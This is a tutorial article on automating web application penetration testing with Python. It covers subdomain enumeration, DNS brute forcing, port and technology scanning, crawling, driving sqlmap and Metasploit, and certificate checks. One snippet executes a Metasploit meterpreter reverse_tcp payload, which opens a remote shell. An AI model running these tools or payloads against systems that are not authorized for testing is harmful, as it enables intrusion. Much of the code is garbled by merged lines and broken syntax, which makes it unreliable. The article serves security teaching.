by Harshit Raj Singh
Python is an incredibly powerful and versatile programming language that is widely used in the field of cybersecurity. As a pentester, having a solid understanding of Python can greatly enhance your ability to identify and exploit vulnerabilities, automate tasks, and write custom tools and scripts. In this article, we will delve into some of the key ways in which Python can be used by pentesters for automating their web pentesting, as well as provide some useful resources for those looking to get started or deepen their knowledge of the language. To get the most out of this article, you need to have a basic understanding of Python.
Why Python?
Python is a high-level, interpreted programming language that is known for its simplicity, readability, and flexibility. It has a large and active community of developers, which has contributed to the creation of a vast ecosystem of libraries and tools that can be used for a wide range of purposes.
In the context of pentesting, Python is often used for a variety of tasks, including:
- Automating and streamlining tasks, such as scanning networks, identifying vulnerabilities, and running exploits
- Writing custom tools and scripts to perform specific tasks or solve specific problems Interacting with and manipulating web servers and applications
- Reverse engineering and analyzing binary files and protocols
- Working with and analyzing data
One of the key benefits of Python is that it is relatively easy to learn and use, even for those with little or no programming experience. Its simple syntax, vast libraries, and wealth of online resources make it an excellent choice for those looking to get started in the field of programming and cybersecurity.
Web Application Pentesting
Web application penetration testing is a process of identifying and reporting vulnerabilities and weaknesses in a web application that could be exploited by attackers. The purpose of pentesting is to detect and report any vulnerabilities that are present so that they can be fixed before they can be used by malicious actors.
The web application penetration testing process involves a systematic series of steps, including gathering information about the target system, identifying vulnerabilities or faults, researching for exploits that can exploit those faults or vulnerabilities, and ultimately compromising the web application.
Steps And Methodologies Used To Perform Web App Pen Test:
Conducting a penetration test on a web application requires a specific set of steps and methodologies to ensure a thorough examination of the app's security.
Information Gathering (Reconnaissance)
The goal of the information gathering, or reconnaissance, phase is to gather as much information about the target system as possible. This information can then be used to identify vulnerabilities and plan the next steps in the penetration testing process. Without a solid foundation of information, the rest of the penetration testing process will be less effective.
There are two types of reconnaissance, depending upon the type of interaction on the target system:
Passive reconnaissance
Passive reconnaissance is a method of gathering information that is already available on the internet without directly interacting with the target system. This type of reconnaissance is less intrusive and less likely to be detected by the target system.
Examples of passive reconnaissance techniques include Google Dorking, using crt.sh to get certificate transparency logs, and using Wayback Machine, which allows people to visit archived versions of Web sites, etc.
Active reconnaissance
Active reconnaissance is the process of directly probing a target system to gather information about it. This is in contrast to passive reconnaissance, which involves gathering information without directly interacting with the target.
Examples of active reconnaissance techniques include fingerprinting a web application, using the Shodan network scanner, performing DNS forward and reverse lookups, and conducting a DNS zone transfer.


Automating the Reconnaissance Phase
Now we are going to use our programming knowledge to automate both active and passive reconnaissance using Python.
Required Libraries:
- dnspython
- requests
- beautifulsoup4
- googlesearch
"""Finding Subdomain using Passive
Recon""" from googlesearch import search
import re
import
requests
import sys
def get_subdomains_using_google_search(domain:str)->set: """
Search for subdomains of a domain using Google search
:param domain: The domain to search for subdomains
:return: A set of subdomains """
# Define your search query query = f"site:*.{domain}"
# Regex to match URLs that contain the string "domain.com" regex = re.compile(r"^(http|https)?[-_\w]+\.{}".format(domain))
subdomains = list()
# Search for the string "site:*.domain.com" in Google and return the list of URLs for url in search(query):
match_url = regex.match(url) if match_url:
subdomains.append(match_url.group()) return set(subdomains)
def get_subdomain_using_crtsh(domain:str)->set: """
Search for subdomains of a domain using crt.sh """
# Define the URL to search for subdomains
url = f"https://crt.sh/?q={domain}&output=json"
# Make a request to the URL response = requests.get(url)
# Regex to match URLs that contain the string "domain.com" regex = re.compile(r"^(http|https)?[-_\w]+\.{}".format(domain))
subdomains = list() wildcard_subdomains = list()
# Search for the string "site:*.domain.com" in Google and return the list of URLs for data in response.json():
if "*" in data['common_name']: wildcard_subdomains.append(data['common_name']) continue
else:
match_url = regex.match(data['name_value']) if match_url:
subdomains.append(match_url.group()) return set(subdomains)
def main():
if len(sys.argv) < 2:
print("Usage: python3 passive_subdomain_finder.py <domain>") sys.exit(1)
else:
domain = sys.argv[1]
print(f"Searching for subdomains of {domain}") google_subdomains = get_subdomains_using_google_search(domain) crtsh_subdomains = get_subdomain_using_crtsh(domain) print("Google Search Subdomains: ", google_subdomains) print("crt.sh Subdomains: ", crtsh_subdomains)
if name == " main ": main()
>>> python3 passive_subdomain_finder.py domain.com Searching for subdomains of domain.com
Google Search Subdomains: {'https://www.domain.com', 'http://blog.domain.com'}
crt.sh Subdomains: {'domainadmin.domain.com', 'app.domain.com', 're-api-staging.domain.co m', 'webmail14.domain.com', 'webmail12.domain.com', 'webmail5.domain.com', 'webmail2.domai n.com', 'cp.domain.com', 'editor.domain.com', 'seo.domain.com', 'app-gateway-staging.domai n.com', 'vip.domain.com', 'webmail6.domain.com', 're-api.domain.com', 'webmail15.domain.co m', 'webmail7.domain.com', 'webmail17.domain.com', 'identity.domain.com', 'webmail13.domai n.com', 'webmail8.domain.com', 'sitebuilder.domain.com', 'telhosting.domain.com', 'smart-b log.domain.com', 'webmail10.domain.com', 'webmail4.domain.com', 'private---domain.com', 'm yhomelabitcom.domain.com', 'secure.domain.com', 'webmail16.domain.com', 'cluster.domain.co m', 'controlpanel.domain.com', 'smart-blog-staging.domain.com', 'blog-api-staging.domain.c om', 'app-gateway.domain.com', 'registration.domain.com', 'app-staging.domain.com', 'webma il3.domain.com', 'verify.domain.com', 'sldacluster.domain.com', 'webmail9.domain.com', 'pr ivate--domain.com', 'buildit.domain.com', 'webmail11.domain.com', 'preview-editor.domain.c om', 'transfers.domain.com', 'webmail.domain.com', 'public---domain.com', 'buildit-stagin g.domain.com', 'blog-api.domain.com'}
"""Finding Subdomains and DNS Records using Active Recon""" import dns.resolver
import threading import sys
from queue import SimpleQueue
def _subdomain_bruteforce_worker(domain:str, verified_subdomains:list, queue:SimpleQueue): """
Bruteforce subdomains """
# Keep looping until the queue is empty while not queue.empty():
# Get the next word from the queue word = queue.get()
url = f"{word}.{domain}"
# Check if the subdomain exists if dns_query(url, 'A'):
verified_subdomains.append(url)
def subdomain_bruteforce(domain:str, wordlist:str): """
Search for subdomains of a domain using bruteforce
:param domain: The domain to search for subdomains
:param wordlist: The wordlist to use
:return: A set of subdomains """
queue = SimpleQueue()
# Add all words from the wordlist to the queue for word in wordlists(wordlist):
queue.put(word)
verified_subdomains = list() threads = list()
# Create 10 threads for _ in range(0, 10):
t = threading.Thread(target=_subdomain_bruteforce_worker, args=(domain, verified_subdo mains, queue))
threads.append(t) t.start()
# Wait for all threads to complete for thread in threads:
thread.join()
print("Subdomains: ", set(verified_subdomains)) def wordlists(filename:str):
"""
Read a wordlist """
for line in open(filename, 'r', encoding='utf-8', errors='ignore'): yield line.strip()
def dns_query(domain:str, record:str): """
Query DNS records """
try:
answers = dns.resolver.resolve(domain, record) return answers
except dns.resolver.NoAnswer: pass
except dns.resolver.NXDOMAIN: pass
except dns.resolver.NoNameservers: pass
except dns.resolver.Timeout: pass
except Exception as e: print(e)
pass return None
def check_dns_records(domain:str): """
Check DNS records for a domain """
for record in ['A', 'AAAA', 'CNAME', 'MX', 'NS', 'SOA', 'TXT']:
answers = dns_query(domain, record) if answers:
for rdata in answers: print(f"{record}: {rdata}")
def main(): """
Main function """
if len(sys.argv) < 3:
print("Usage: python3 domain_discovery.py <domain> <wordlist>") sys.exit(1)
else:
domain = sys.argv[1] wordlist_filename = sys.argv[2]
print(f"Checking DNS records for {domain}") check_dns_records(domain)
print("*"*50)
print(f"Searching for subdomains of {domain} using Bruteforce") subdomain_bruteforce(domain, wordlist_filename)
if name == " main ": main()
>>> python3 domain_discovery.py domain.com wordlist.txt Checking DNS records for domain.com
A: 13.228.112.135
MX: 10 mx.domain.com. NS: ns-166.awsdns-20.com.
NS: ns-2022.awsdns-60.co.uk. NS: ns-683.awsdns-21.net.
NS: ns-1250.awsdns-28.org.
SOA: ns-2022.awsdns-60.co.uk. awsdns-hostmaster.amazon.com. 2017090501 7200 900 1209600 86
400
TXT: "google-site-verification=zlpN6bg9OaBJVw4Lv4-1fZ2wHekVqEnEGBXwuonNpBM"
TXT: "v=spf1 ip4:38.113.1.0/24 ip4:38.113.20.0/24 ip4:12.45.243.128/26 ip4:65.254.224.0/19
include:_spf.google.com include:_spf.qualtrics.com -all"
TXT: "google-site-verification=1aIdxE8tG_8BUCMClWep8Z33AIxgsL91plweqqCuNZU" TXT: "google-site-verification=M2Ehy1mb_Yh-Z57igzRDXPY35c5nNsYmI_l3B6D9zZs"
************************************************** Searching for subdomains of domain.com using Bruteforce
Subdomains: {'pop.domain.com', 'online.domain.com', 'cp.domain.com', 'billing.domain.co m', 'www1.domain.com', 'client.domain.com', 'origin.domain.com', '4.domain.com', 'join.dom ain.com', 'mail5.domain.com', 'ns3.domain.com', 'mail4.domain.com', 'sftp.domain.com', 'ma il3.domain.com', 'cn.domain.com', 'www.domain.com', 'dashboard.domain.com', 'images.domai
n.com', 'services.domain.com', 'panel.domain.com', 'test.domain.com', '3.domain.com', '8.d omain.com', 'api.domain.com', 'api-test.domain.com', 'wordpress.domain.com', 'mail6.domai n.com', 'register.domain.com', 'sip.domain.com', 'vip.domain.com', 'members.domain.com',
'imap.domain.com'}
We can also use Sublist3r which is written in Python for subdomain enumeration; it supports both active and passive subdomain enumeration.
import sublist3r
subdomains = sublist3r.main(domain="domain.com", no_threads="30", savefile="domain_subs.s. txt", ports=None, silent=False, verbose=False, enable_bruteforce=True, engines=False)
Other Python alternatives for subdomain brute-forcing:
- subbrute
- aiodnsbrute
- altdns
Using nmap port scanner in our Python program for network scanning:
import nmap3
nmap = nmap3.Nmap()
top_ports = nmap.scan_top_ports("domain.com")
os_results = nmap.nmap_os_detection("domain.com")
version_result = nmap.nmap_version_detection("domain.com")
#Results will be in JSON format
- Using Wappalyzer and Webtech for identifying technologies used on websites:
from Wappalyzer import Wappalyzer, WebPage
webpage = WebPage.new_from_url('https://domain.com') wappalyzer = Wappalyzer.latest(update=True)
result = wappalyzer.analyze_with_versions_and_categories(webpage) '''
{'Optimizely': {'versions': [], 'categories': ['Analytics']}, 'Nginx': {'versions': [], 'c ategories': ['Web servers', 'Reverse proxies']}, 'Amazon Cloudfront': {'versions': [], 'ca tegories': ['CDN']}, 'Google Tag Manager': {'versions': [], 'categories': ['Tag manager s']}, 'Amazon Web Services': {'versions': [], 'categories': ['PaaS']}}
'''
import webtech
wt = webtech.WebTech(options={"json":True}) result = wt.start_from_url("https://domain.com") '''
{'tech': [{'name': 'Nginx', 'version': None}, {'name': 'Amazon Cloudfront', 'version': Non
e}, {'name': 'Google Tag Manager', 'version': None}], 'headers': [{'name': 'x-amz-id-2', 'value': 'ZzHuolcP1O19qKTZTZPTL8UWkIS0pxAmnzti456IqFIz+VGraj6zoavVFaGKc4sBndUCQUqXrEs='},
{'name': 'x-amz-request-id', 'value': 'SJZMMGPJ11FW1QJW'}, {'name': 'x-amz-meta-cf-origi n', 'value': 'coldstone-bucket'}, {'name': 'x-amz-version-id', 'value': 'psVWYmHEhj._PacQ2 9tCEqpL7BdgiQ4T'}, {'name': 'X-Amz-Cf-Pop', 'value': 'SIN2-P2'}]}
'''
"""This is a simple script for crawling the website.""" import sys
import asyncio import aiohttp import lxml.html from furl import furl
async def get_links(url:str, max_links:int=None)->list[str]: """
Args:
url (str): url of the page
max_links (int): maximum number of links to return
Returns:
List[str]: returns a list of links
"""
links = []
if url not in visited: visited.add(url) try:
# Make a request to the website
async with aiohttp.ClientSession() as session: async with session.get(url) as resp:
if resp.status != 200: return links
html = await resp.text() resp_url = furl(resp.url)
# Parse the HTML content
doc = lxml.html.fromstring(html) links_object = doc.cssselect('a') for link in links_object:
crawl_link = link.attrib.get('href')
if not any(x in crawl_link for x in list_of_invalid_links):
if resp_url.host in crawl_link or crawl_link.startswith('/'):
domain
else:
# Check if the link is relative without '/' and not other
if not crawl_link.startswith('http'): resp_url.path = crawl_link links.append(resp_url.url)
if max_links and len(links) >= max_links: break
except Exception as e: print(e)
pass
return links
async def crawl(url:str, depth:int=1)->None: """
Args:
url (str): url of the page
depth (int, optional): depth of the crawl. Defaults to 1.
"""
print("Crawling: ", url)
# Get all the links from the page links = await get_links(url) crawl_urls.extend(links)
if depth > 0:
# Create a list of coroutines to crawl the links
coroutines = [crawl(link, depth=depth-1) for link in links if link not in visited] await asyncio.gather(*coroutines)
async def main(): url = sys.argv[1] depth = 1
if len(sys.argv) > 2:
depth = int(sys.argv[2]) await crawl(url, depth)
if name == " main ": if len(sys.argv) < 2:
print("Usage: python3 crawler.py <url> <depth>") sys.exit(1)
visited = set() crawl_urls = []
# invalid links to ignore
list_of_invalid_links = ['mailto', 'javascript', 'tel', 'sms']
# Start the crawler
asyncio.run(main())
print(f"Crawled links: {set(crawl_urls)}")
>>> python3 crawler.py http://testphp.vulnweb.com 2 Crawling: http://testphp.vulnweb.com
Crawling: http://testphp.vulnweb.com/index.php Crawling: http://testphp.vulnweb.com/categories.php
--snip--
Crawled links: {'http://testphp.vulnweb.com/artists.php', 'http://testphp.vulnweb.com/Deta ils/web-camera-a4tech/2/', 'http://testphp.vulnweb.com/index.php', 'http://testphp.vulnwe b.com/%3Fpp=12', 'http://testphp.vulnweb.com/disclaimer.php', 'http://testphp.vulnweb.com/ privacy.php', 'http://testphp.vulnweb.com/%23', 'http://testphp.vulnweb.com/categories.ph p', 'http://testphp.vulnweb.com/hpp/', 'http://testphp.vulnweb.com/signup.php', 'http://te stphp.vulnweb.com/login.php', 'http://testphp.vulnweb.com/listproducts.php%3Fcat=4', 'htt p://testphp.vulnweb.com/Mod_Rewrite_Shop/', 'http://testphp.vulnweb.com/userinfo.php', 'ht tp://testphp.vulnweb.com/cart.php', 'http://testphp.vulnweb.com/AJAX/index.php', 'http://t estphp.vulnweb.com/artists.php%3Fartist=3', 'http://testphp.vulnweb.com/artists.php%3Farti st=1', 'http://testphp.vulnweb.com/Details/network-attached-storage-dlink/1/', 'http://tes tphp.vulnweb.com/listproducts.php%3Fcat=2', 'http://testphp.vulnweb.com/artists.php%3Farti st=2', 'http://testphp.vulnweb.com/guestbook.php', 'http://testphp.vulnweb.com/Details/col or-printer/3/', 'http://testphp.vulnweb.com/listproducts.php%3Fcat=3', 'http://testphp.vul nweb.com/listproducts.php%3Fcat=1'}
- Best python alternatives for fast high-level web crawling/spidering & scraping.
Scanning and Exploitation
The second phase of web application penetration testing is scanning and exploitation. This phase involves utilizing the information gathered in the reconnaissance phase to further investigate the target web application and using automated tools and manual techniques to identify vulnerabilities in the target web application and then exploiting those vulnerabilities to gain unauthorized access.
During the scanning phase, penetration testers use tools such as Nessus, OpenVAS, and Burp Suite to scan the web application for known vulnerabilities. These tools generate a report that highlights the potential attack vectors, including information about open ports, software versions, and misconfigurations.

Once vulnerabilities have been identified, the exploitation phase begins. During this phase, penetration testers use tools such as Metasploit, SQLMap, and to take advantage of the identified vulnerabilities and gain access to the web application. This can include exploiting SQL injection vulnerabilities, cross-site scripting, and file inclusion vulnerabilities.
It is important to note that while scanning and exploitation are closely related, they are distinct steps in the web application penetration testing process. The scanning phase is focused on identifying vulnerabilities, while the exploitation phase is focused on confirming and exploiting those vulnerabilities.
Automating the Scanning and Exploitation Phase:
Required Libraries:
- requests
- beautifulsoup4
- selenium
- Wappalyzer
- pymetasploit3
import requests
from bs4 import BeautifulSoup from selenium import webdriver
from wappalyzer import Wappalyzer, WebPage from pymetasploit3.msfrpc import *
# Use requests to send a GET request to the web page response = requests.get("http://example.com")
# Use beautifulsoup4 to parse the HTML of the web page soup = BeautifulSoup(response.text, 'html.parser')
# Extract information from the web page
version = soup.find("meta", {"name": "generator"})["content"]
# Use Selenium to automate interaction with the web page driver = webdriver.Firefox() driver.get("http://example.com")
# Use wappalyzer to identify the technologies used on the web page wappalyzer = Wappalyzer.latest()
webpage = WebPage.new_from_driver(driver) technologies = wappalyzer.analyze(webpage)
# Close the browser driver.quit()
known_vulnerabilities = [] #list of known vulnerabilities
# Check for known vulnerabilities in the identified technologies for technology in technologies:
if technology in known_vulnerabilities: print("Vulnerability found: " + technology)
# Metasploit exploitation
msf = MsfRpcClient('password')
# Attempt to exploit any known vulnerabilities
for vulnerability in known_vulnerabilities[technology]: exploit = msf.modules.use('exploit', vulnerability)
exploit.execute(payload='windows/meterpreter/reverse_tcp', rhost='example.com')
- Using wafw00f for identifying and fingerprinting Web Application Firewall (WAF) products protecting a website.
from wafw00f.main import WAFW00F as waf
firewall_scanner = waf(target='https:://example.com', followredirect=True, extraheaders=
{}, proxies=None)
#identifying name of the firewall identified_WAF = firewall_scanner.identwaf() print("Firewall: ", identified_WAF)
#checking if firewall scanner has generic detection
if firewall_scanner.genericdetect() and not identified_WAF: reason = firewall_scanner.knowledge['generic']['reason'] print("Reason: ", reason)
"""
Firewall: ['Edgecast (Verizon Digital Media)'] """
- Using sqlmap inside a python program using a subprocess module for detecting and exploiting SQL injection vulnerabilities.
import subprocess
from shlex import split
def sqlmap_scan(url): try:
result = subprocess.run(split(f"sqlmap -u {url} --batch"), capture_output=True, te xt=True)
return result.stdout
except subprocess.CalledProcessError as e: return e.output
# Example usage
url = "http://example.com/page?id=1" output = sqlmap_scan(url) print(output)
- Using python-nessus library for automating Nessus vulnerability scans using Python.
from pynessus import Nessus
from pynessus.models.user import User
# Connect to Nessus
nessus = Nessus("localhost", 8834)
if nessus.login(User("admin", "password")): nessus.load_scans()
# display scans
for scan in nessus.scans:
print "%s - %s" % (scan.uuid, scan.name)
# creating a new scan scan = nessus.Scan() scan.name = "example.com" # Launch scan
if s.launch():
print(f"Scan {s.uuid} successfully launched") else:
print(f"Error occured while launching scan {scan.name}")
else:
print "Fail!"
- Other python alternatives for vulnerability scanning:
- python-owasp-zap
- w3af
- vulners
- openvas-lib
- Bolt
- XSStrike
Reporting and Recommendations: Putting it All Together
The reporting and recommendations phase of web application pentesting is crucial in ensuring the security of a website or web application. The goal of this phase is to document the vulnerabilities that were identified during the assessment and provide recommendations on how to mitigate them.
When creating a web application penetration testing report, it's important to include the following key elements:
- Summary: A brief overview of the testing scope, methodology, and the key findings.
- Testing Methodology: A detailed description of the testing methodology, including the tools and techniques used, the scope of the assessment, and the schedule of the assessment.
- Vulnerability Findings: A comprehensive list of the vulnerabilities that were identified, including the severity of each vulnerability, the impact of the vulnerability, and the recommended solution for mitigating it.
- Proof of Concept (POC): Screenshots, log files, and other evidence that support the findings and recommendations.
- References: Additional resources and links that may be useful.
Automating the Reporting And Recommendations Phase:
You can automate this process by first creating a sample template that will include the summary, recommendation(mitigation), and reference of the vulnerability for which you have created the tools/plugins. And for the methodology, you can add steps in your script about what it is doing and also take a screenshot using pyppeteer or create images using Pillow python lib as a POC. After that, you can use the reportlab module to generate professional-looking reports in PDF format.
Below is the small script for checking the website's SSL certificate information and creating an image with the SSL certificate information and also marking SSL remaining days until expiration using a red rectangle.
import ssl import socket import datetime import json import sys
from furl import furl
from PIL import Image, ImageDraw, ImageFont
def create_poc(text_dict:dict, marked_text:str=None): """
Creates a proof of concept image with the given text and marks the given text with a red rectangle
"""
# Create a new image with a black background
img = Image.new('RGB', (800, 300), color = (0, 0, 0))
# Create a draw object to draw on the image draw = ImageDraw.Draw(img)
# Define font and font size
font = ImageFont.truetype("arial.ttf", 16)
# Write the text to the image x, y = 10, 10
draw.text((x, y), f'Url: {url}', font=font, align='center', fill=(255, 255, 255)) for key, value in text_dict.items():
y += 30
# Draw a red rectangle around the marked text if marked_text and marked_text == value:
text_width, text_height = draw.textsize(f"{key}: {value}", font=font) draw.rectangle([x, y, x+text_width, y+text_height], fill=(255, 0, 0)) draw.text((x, y), f"{key}: {value}", font=font, fill=(255, 255, 255))
draw.text((x, y), f"{key}: {value}", font=font, fill=(255, 255, 255))
# Save the image img.save("ssl_info.jpg")
def get_certificate_info(url:str) -> dict: """
Get the expiration date and other info of a website's SSL certificate.
"""
# Check if scheme is https or http scheme = furl(url).scheme
if scheme == "http":
print("Host is not using HTTPS.") return
elif scheme == "https": pass
else:
url = f"https://{url}" hostname = furl(url).host
# Create an SSL context
context = ssl.create_default_context()
sock = socket.create_connection((hostname, 443))
ssl_sock = context.wrap_socket(sock, server_hostname=hostname) cert = ssl_sock.getpeercert()
try:
sock.close() ssl_sock.close()
except: pass
# Extract the expiration date from the certificate issue_date = cert["notBefore"]
expiration_date = cert["notAfter"] issuer = cert["issuer"]
subject = cert["subject"]
# Convert the expiration date from string to datetime object
expiration_date_dt = datetime.datetime.strptime(expiration_date, "%b %d %H:%M:%S %Y %Z") current_date = datetime.datetime.now() # Get the current date
days_until_expiration = expiration_date_dt - current_date # Calculate the number of days until the certificate expires
# Return the results result = {
"Not Valid After": days_until_expiration.days, "Expiration Date": expiration_date,
"Issue Date": issue_date,
"Issuer": f"{issuer[0][0][1]} {issuer[1][0][1]} {issuer[2][0][1]}", "Subject": subject[0][0][1]
}
return result
poc_desc1 = 'The SSL/TLS certificate provided by the host cannot be trusted because it has expired.'
poc_desc2 = 'The host uses an SSL/TLS certificate which will expire in {} days.' if name == " main ":
if len(sys.argv) < 2:
print("Usage: python3 ssl_checker.py <url>") sys.exit(1)
else:
url = sys.argv[1]
result = get_certificate_info(url) if result["Not Valid After"] < 0:
print(poc_desc1) else:
print(poc_desc2.format(result["Not Valid After"]))
print(f"For more information, see the following JSON output:\n{json.dumps(result, indent
=4)}")
create_poc(result, marked_text=result["Not Valid After"])
"""
The host uses an SSL/TLS certificate which will expire in 393 days. For more information, see the following JSON output:
{
"Not Valid After": 393,
"Expiration Date": "Feb 13 23:59:59 2024 GMT",
"Issue Date": "Jan 13 00:00:00 2023 GMT",
"Issuer": "US DigiCert Inc DigiCert TLS RSA SHA256 2020 CA1", "Subject": "US"
}
"""

Wrapping Up
In conclusion, web application pentesting is an essential step in ensuring the security of a website or web application. By identifying and addressing vulnerabilities, organizations can protect their assets and sensitive data from cyber-attacks.
Python is a powerful tool for automating the process of web application pentesting. With its vast array of libraries and modules, it allows for efficient and effective testing of web applications.
In this article, we have discussed the methodology of web application pentesting and how it can be automated using Python. From reconnaissance to identifying vulnerabilities and exploiting them, we have seen how Python can be used to streamline the process and make it more efficient.
However, it's important to note that automation should never replace manual testing, and it's always a good idea to have a combination of both manual and automated testing to ensure that all vulnerabilities are identified and addressed.
By understanding the importance and the process of web application pentesting, and by utilizing Python to automate the process, Security Researchers can better protect organizations against potential cyber threats.